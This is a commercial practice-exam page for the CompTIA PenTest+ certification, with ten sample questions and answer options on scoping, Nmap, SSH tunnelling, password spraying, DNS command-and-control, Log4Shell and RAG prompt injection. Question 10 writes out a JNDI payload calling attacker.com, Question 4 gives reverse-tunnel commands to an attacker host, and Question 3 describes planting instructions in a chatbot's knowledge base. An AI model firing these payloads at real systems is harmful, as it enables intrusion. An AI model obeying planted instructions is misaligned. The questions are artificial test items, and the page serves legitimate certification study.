CompTIA · Practice exam

Free CompTIA PenTest+ Practice Questions

The CompTIA Pentest+ exam is up to 90 questions in 165 minutes. CertCrush provides 450 syllabus-aligned practice questions and 20 performance-based questions across all 5 exam domains, each with a full explanation. Free to try, no account required.

No account · No card · Pass or refund

Try one · Reconnaissance and Enumeration

A penetration tester runs the following Nmap command and receives the output shown below. Based on this output, which of the following conclusions is MOST accurate? Command: nmap -sV -O -p 21,22,80,443,445,3389 192.168.1.100 Output: PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.4 80/tcp open http Apache httpd 2.4.29 443/tcp closed https 445/tcp open microsoft-ds Windows Server 2016 3389/tcp open ms-wbt-server Microsoft Terminal Services OS: Windows Server 2016

Practice questions
450
Exam time limit
165 min
Practice pass mark
70%

In the full course

What you get

  • 450 exam-style questions, each with a full explanation
  • 20 performance-based tasks, marked with partial credit
  • 200 flashcards, filtered by domain
  • The full study guide, 7 chapters
  • Timed mock exams matched to the real exam length
  • A readiness score weighted by the official exam blueprint

Get full access to CompTIA Pentest+

All questions, timed exams, flashcards, PDF study guide download & progress tracking.

This course

$9.99

one-time

Pass or refund
Create account and buy

30 seconds, then straight to checkout.

Until 30 November

Lifetime · all courses

$29.99

One payment · future courses included

Create account and buy

30 seconds, then straight to checkout.

PASS GUARANTEEOR MONEY BACK

Pass, or your money back

Reach 85% readiness on this course, sit the real exam, and if you don't pass we refund it in full. Applies to this single-course purchase. Terms.

More free samples

Marked, and passed

Real feedback from people who passed

“Honestly wasn't expecting much but this is probably the best ten bucks I've spent on exam prep. Did 20–30 questions every morning before work for 6 weeks. Passed with a comfortable margin. The timed exam mode is what really got me comfortable with the pressure.”
PSPriya S.CompTIA Security+
“I'm not a natural test taker and I get bad exam anxiety. Doing 50+ timed practice sessions on here meant by the time I sat the real thing it just felt like another practice run. Huge confidence booster.”
DMDan M.CompTIA CySA+
“I failed my CISSP on the first attempt with another platform. Switched to CertCrush, focused on my weak domains using the tracking feature, and passed three months later. The explanations for wrong answers are genuinely useful, not just 'A is correct because A is correct'.”
MTMarcus T.ISC² CISSP

CompTIA PenTest+ is an intermediate cybersecurity certification that validates your ability to plan, scope, and execute penetration tests against networks, web applications, cloud environments, and AI systems.

Practice content last updated · Independently written and aligned to CompTIA’s published exam objectives.

About the CompTIA Pentest+ Exam

CertCrush helps you prepare with free PenTest+ practice questions, timed practice tests and full mock exams with a clear explanation for every answer.

Exam Domains Covered

  • Engagement Management13%
  • Reconnaissance and Enumeration21%
  • Vulnerability Discovery and Analysis17%
  • Attacks and Exploits35%
  • Post-Exploitation and Lateral Movement14%

Try 2 performance tasks free

Drag-and-drop, sequencing and configuration tasks that mirror the interactive questions on the real CompTIA Pentest+ exam, marked with partial credit.

Start free

Sample Practice Questions

The following questions are a preview of the type of syllabus-aligned questions you will practise in CertCrush. They reflect the format and reasoning style of the CompTIA Pentest+ exam, not actual exam content.

Q1.During a penetration test, a junior tester on the team accidentally runs a denial-of-service attack against a production system that was explicitly listed as off-limits in the Rules of Engagement. The system experiences a brief outage before the attack is stopped. Which of the following BEST describes the potential consequences of this action? (Select TWO)

  • A.The testing firm may face legal liability for unauthorized access to a system outside the agreed scope
  • B.The junior tester will automatically lose their penetration testing certification
  • C.The testing firm may be in breach of contract, potentially resulting in termination of the engagement and financial penalties
  • D.The client is required to file a police report for any ROE violation
  • E.The engagement results are automatically invalidated and cannot be used

Domain: Engagement Management

Q2.A penetration tester runs the following Nmap command and receives the output shown below. Based on this output, which of the following conclusions is MOST accurate? Command: nmap -sV -O -p 21,22,80,443,445,3389 192.168.1.100 Output: PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.4 80/tcp open http Apache httpd 2.4.29 443/tcp closed https 445/tcp open microsoft-ds Windows Server 2016 3389/tcp open ms-wbt-server Microsoft Terminal Services OS: Windows Server 2016

  • A.The host is a standard Windows server with typical services and no anomalies
  • B.The host is running Windows Server 2016 with an unusual configuration: vsftpd is a Linux FTP server running on a Windows host, which may indicate a containerized service or misconfiguration worth investigating
  • C.HTTPS being closed means the server has no web presence
  • D.The presence of both SSH and RDP means the system is dual-booted with Linux and Windows

Domain: Reconnaissance and Enumeration

Q3.A penetration tester is assessing an AI-powered customer service chatbot that uses Retrieval-Augmented Generation (RAG) to answer questions from a knowledge base. The tester embeds malicious instructions in a document that gets indexed into the knowledge base. When users interact with the chatbot, it follows the attacker's embedded instructions. What type of attack is this?

  • A.Direct prompt injection, because the attacker directly interacts with the chatbot
  • B.Indirect prompt injection, because malicious instructions are placed in external data sources that the LLM processes during retrieval
  • C.Data poisoning, because the training data was corrupted
  • D.Adversarial input attack, because the attacker crafted specific inputs to fool the model

Domain: Attacks and Exploits

Q4.A penetration tester has compromised a server in a DMZ that cannot make outbound connections to the attacker's machine. However, the attacker can SSH to the compromised server. The tester needs to access an internal service on port 22 of 10.0.0.50 from the compromised server. Which SSH tunnel command should the tester run from the compromised server?

  • A.ssh -R 9090:10.0.0.50:22 attacker@attacker_ip, creating a reverse tunnel so the attacker can reach the internal service through localhost:9090
  • B.ssh -L 9090:10.0.0.50:22 attacker@attacker_ip, creating a local forward on the compromised server
  • C.ssh -D 9090 attacker@attacker_ip, creating a dynamic SOCKS proxy for all internal traffic
  • D.scp -r 10.0.0.50:/etc/ attacker@attacker_ip:/tmp/, copying files directly through the SSH session

Domain: Post-Exploitation and Lateral Movement

Q5.A penetration tester discovers three individual findings during an assessment: a low-severity information disclosure that reveals internal IP addresses, a medium-severity SSRF vulnerability, and a low-severity default credential on an internal service. Individually, none are critical. How should the tester present these in the report?

  • A.Present them as a vulnerability chain showing how the information disclosure enables SSRF targeting of internal services where default credentials grant unauthorized access, resulting in a critical combined impact
  • B.Report each finding independently at its individual severity level without mentioning relationships between them
  • C.Omit the two low-severity findings from the report and only include the medium-severity SSRF
  • D.Average the three CVSS scores to calculate a combined severity rating

Domain: Vulnerability Discovery and Analysis

Q6.A penetration tester discovers a remote code execution vulnerability and calculates a CVSS v3.1 base score of 9.0 (Critical). Upon further research, the tester finds that no public exploit code exists, a vendor patch was released last week, and the vulnerability has not been confirmed by multiple independent sources. How do the CVSS temporal metrics affect the overall score?

  • A.The temporal score will be lower than 9.0 because all three temporal metrics reduce the base score in this scenario
  • B.The temporal score remains 9.0 because temporal metrics only increase scores
  • C.The temporal score increases above 9.0 because the vendor patch proves the vulnerability is real
  • D.Temporal metrics have no effect because they are optional and rarely used

Domain: Engagement Management

Q7.A penetration tester is conducting a network scan against a production environment during business hours and wants to balance speed with stealth to avoid disrupting operations or triggering IDS alerts. The tester is currently using the default Nmap timing template. Which timing template is the tester using, and what would be a more appropriate choice for this scenario?

  • A.The default is -T3 (normal), and the tester should consider using -T2 (polite) to reduce the chance of disruption and detection
  • B.-T4 is the default, and the tester should switch to -T3 for production environments
  • C.The default is -T1 (sneaky), and no change is needed for production environments
  • D.-T5 is the default, and the tester should reduce to -T4 for production use

Domain: Reconnaissance and Enumeration

Q8.A penetration tester is planning a password attack against a client's Microsoft 365 tenant. The tester wants to test a small set of commonly used passwords against all discovered user accounts while minimizing account lockouts. Which of the following are characteristics of the password spraying technique that make it suitable for this scenario? (Select TWO)

  • A.It tests one or a few passwords against many accounts before moving to the next password, avoiding per-account lockout thresholds
  • B.It tries every possible password combination against a single account before moving to the next
  • C.Tools like MSOLSpray are specifically designed for spraying against Azure AD/Office 365 endpoints with built-in lockout awareness
  • D.It requires extracting password hashes from the target environment before testing
  • E.It works by intercepting authentication tokens from the network

Domain: Attacks and Exploits

Q9.A penetration tester needs to establish a covert command-and-control channel that can bypass most firewalls and content inspection systems. The tester decides to tunnel C2 communications over DNS queries to a domain they control. Which tool requires the tester to set up an authoritative DNS server for their domain to relay the tunneled traffic?

  • A.Netcat, which can be configured to listen on DNS port 53 for tunneled connections
  • B.dnscat2, which requires running dnscat2-server on an authoritative DNS server for the attacker's domain to relay C2 traffic through DNS queries
  • C.Meterpreter with reverse_dns payload, which handles DNS tunneling automatically
  • D.Cobalt Strike's HTTP beacon, which can fall back to DNS if HTTP is blocked

Domain: Post-Exploitation and Lateral Movement

Q10.A penetration tester discovers that a client's Java-based web application is using Apache Log4j version 2.14.1. The tester crafts a request containing ${jndi:ldap://attacker.com/exploit} in the User-Agent header. Which vulnerability is the tester attempting to exploit, and what is the recommended mitigation?

  • A.CVE-2021-44228 is a denial-of-service vulnerability that crashes the Java application
  • B.Log4Shell (CVE-2021-44228) - a JNDI lookup RCE vulnerability; the immediate mitigation is setting formatMsgNoLookups=true or upgrading Log4j to a patched version
  • C.This is a Server-Side Request Forgery vulnerability specific to LDAP
  • D.The vulnerability only affects Log4j version 1.x and this version is not affected

Domain: Vulnerability Discovery and Analysis

CompTIA Pentest+ guides & exam news

Frequently Asked Questions

Does the CompTIA Pentest+ course include performance-based questions?

Yes. The CompTIA Pentest+ course includes 20 performance-based questions (PBQs): hands-on tasks that mirror the interactive questions on the real exam, including drag-and-drop matching, sequencing and configuration screens. Each one is marked with partial credit, so you can see exactly which placements were wrong, and every task includes a full explanation. The first two are free to try.

What is included in the free CompTIA Pentest+ sample?

The free sample includes 10 syllabus-aligned practice questions, sample flashcards, and a preview chapter from the study guide. No account or payment is required to try the sample.

How many questions are in the full CompTIA Pentest+ course?

The full CompTIA Pentest+ course includes 450 practice questions and 20 performance-based tasks, covering all 5 exam domains. Every question carries a full explanation for the right answer and the wrong ones.

Are these official CompTIA exam questions?

No. CertCrush questions are independently written and syllabus-aligned. They mirror the format, difficulty, and reasoning style of the official exam. We are not affiliated with or endorsed by CompTIA.

Which domains does the CompTIA Pentest+ course cover?

The course covers 5 exam domains: Engagement Management, Reconnaissance and Enumeration, Vulnerability Discovery and Analysis, Attacks and Exploits, Post-Exploitation and Lateral Movement.

Can I study on mobile?

Yes. CertCrush is fully responsive and works on phones, tablets, and desktops. The timed exam, flashcards, and study guide all work on mobile without installing an app.

What happens when I create an account?

Creating a free account lets you access full courses, track your weak areas by domain, and resume practice sessions across devices. No credit card is required to register.

Start with 10 free questions

No account, no card. The full CompTIA Pentest+ course is $9.99, once.

Start freeBuy · $9.99